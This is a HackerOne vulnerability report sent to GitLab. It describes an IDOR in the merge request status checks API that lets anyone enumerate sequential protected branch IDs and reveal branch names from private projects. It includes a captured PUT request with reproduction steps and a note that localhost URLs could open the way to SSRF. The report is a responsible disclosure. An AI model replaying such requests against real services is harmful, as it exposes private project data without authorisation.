IDOR in setting status check of merge request allows adding protected branches of private projects and discloses the branch names
HackerOne report #1294017 by ashish_r_padelkar
on 2021-08-06, assigned to GitLab Team:
Report
Summary
Hello,
There is a new feature currently available only on gitlab.com https://gitlab.com/<GroupName>/<ProjectName>/edit
in Merge Request
section named Status Checks
While adding a new status check, the request is vulnerable to IDOR for branch names. If you just replace IDs of branches, you can set/get their name even if they are belong to private project where you don't have any access. The IDs are sequential so you can easily obtain the names in bulk.
Steps to reproduce
-
Login as a maintainer in your project and go to
https://gitlab.com/<GroupName>/<ProjectName>/edit
inMerge Request
section , click onAdd Status Check
button. -
Add your inputs.(allows adding localhost urls too . I am bringing this to your attention as normally gitlab wont allow localhost urls). select your branch in branch dropdown and add. Capture the request like below.
PUT /api/v4/projects/23887195/external_status_checks/50 HTTP/2
Host: gitlab.com
Cookie: 1
Content-Length: 120
Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
Accept: application/json, text/plain, */*
X-Csrf-Token: 1
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: https://gitlab.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://gitlab.com/privategroup4321/githubimport/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"external_url":"http://127.0.0.1/","id":50,"name":"Anything","protected_branch_ids":[41438448]}
-
just replace the value of
protected_branch_ids
in above request to any protected branch ID that may belong to private project that you dont have access to. these IDs are sequential. -
Send the request and you can see the protected branch name in response as well as UI.
-
This way you can obtain protected branch names of any project irrespective their visibilities!
What is the current bug behavior?
Able to fetch protected branch names of private projects and create a status check using those.
What is the expected correct behavior?
Only branches belong to the projects should be added in status check.
Output of checks
This bug happens on GitLab.com GitLab Enterprise Edition 14.2.0-pre 62864aa6970
As mentioned above, this feature is not yet available in local installations.
Regards,
Ashish
Impact
Able to fetch protected branch names of private projects and create a status check using those.
The request also takes URL as an input and it allows adding localhost urls such as http://127.0.0.1
. I am currently not sure about this wether this is vulnerable to Blind SSRF as this feature is not available on local installations yet. The request of this URL is sent when merge request is updated.
I would have checked for SSRF too if the feature was available on local but I will update about this later whenever the feature is available on local installation and if its vulnerable to blind ssrf.
How To Reproduce
Please add reproducibility information to this section: